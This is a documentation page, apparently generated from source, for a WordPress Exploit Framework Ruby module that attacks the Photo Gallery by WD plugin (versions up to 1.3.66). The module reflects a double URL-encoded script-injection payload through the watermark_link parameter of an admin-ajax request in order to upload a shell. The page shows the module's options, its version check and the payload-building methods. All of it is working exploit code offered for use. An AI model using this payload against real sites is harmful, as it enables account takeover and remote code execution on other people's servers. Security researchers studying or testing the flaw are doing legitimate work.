class Wpxf::Exploit::PhotoGalleryReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/photo_gallery_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Photo Gallery by WD <= 1.3.66 Reflected XSS Shell Upload', author: [ 'Karim El Ouerghemmi', # Dislosure 'rastating' # WPXF module ], references: [ ['WPVDB', '9031'] ], date: 'Feb 22 2018' ) register_options([ IntegerOption.new( name: 'gallery_id', desc: 'A valid Photo Gallery gallery ID', required: true ), IntegerOption.new( name: 'image_id', desc: 'A valid ID of an image within the chosen gallery', required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/photo_gallery_xss_shell_upload.rb, line 35 def check check_plugin_version_from_readme('photo-gallery', '1.3.67') end
url_with_xss()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/photo_gallery_xss_shell_upload.rb, line 43 def url_with_xss "#{wordpress_url_admin_ajax}?action=GalleryBox&gallery_id=#{datastore['gallery_id']}&image_id=#{datastore['image_id']}&watermark_link=#{xss_payload}&watermark_type=image" end
xss_payload()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/photo_gallery_xss_shell_upload.rb, line 39 def xss_payload url_encode(url_encode("\"><script>#{xss_ascii_encoded_include_script}</script>")) end